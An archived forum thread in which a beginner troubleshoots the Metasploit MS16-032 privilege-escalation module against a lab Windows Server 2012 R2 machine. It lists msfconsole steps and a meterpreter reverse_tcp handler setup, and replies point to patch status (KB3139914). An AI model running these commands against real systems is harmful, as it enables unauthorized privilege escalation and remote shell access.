Jump to content

Archived

This topic is now archived and is closed to further replies.

ezejuf

ms16-032

Recommended Posts

hello everyone , im new to this so please bare with 

i have a lab environment with a windows server 2012 r2 that im trying to perform ms16-032 on it ...

i go to kali linux ... start msfconsole and follow the steps 

1 - use exploit/windows/local/ms16_032_secondary_logon_handle_privesc

2- set target 1 ( x64)

3- set session 1

4- exploit 

and i get this error exploit failed: Msf::OptionValidateError the following options failed to validate : SESSION.

what should i do ? lhost is set to the ip of my kali linux machine and port is set to 4444

help please

 

Share this post


Link to post
Share on other sites

hey ... well yes i tried ...

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost "mylocalip"

exploit 

it just gives the message started reverse tcp handler on 0.0.0.0:4444 and hangs there

Share this post


Link to post
Share on other sites

It is a question that has to be asked.  Did you fully path the victim machine?  If so, it will not work.  You will need to load a completely unpatched OS.  I only used it with Win7.  Have not tried it with server but should work.

Share this post


Link to post
Share on other sites
5 minutes ago, PoSHMagiC0de said:

It is a question that has to be asked.  Did you fully path the victim machine?  If so, it will not work.  You will need to load a completely unpatched OS.  I only used it with Win7.  Have not tried it with server but should work.

ah ok ... probably cause its patched :D ... i scanned it with nmap ... what should i look for ... is there a way to know is the victims os is fully updated ?

Share this post


Link to post
Share on other sites

You can guess from last reboot if it is after 2016 then it might be patched.  Only other way is look to see if the patch is installed.

In this case I think it might be "KB3139914".

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...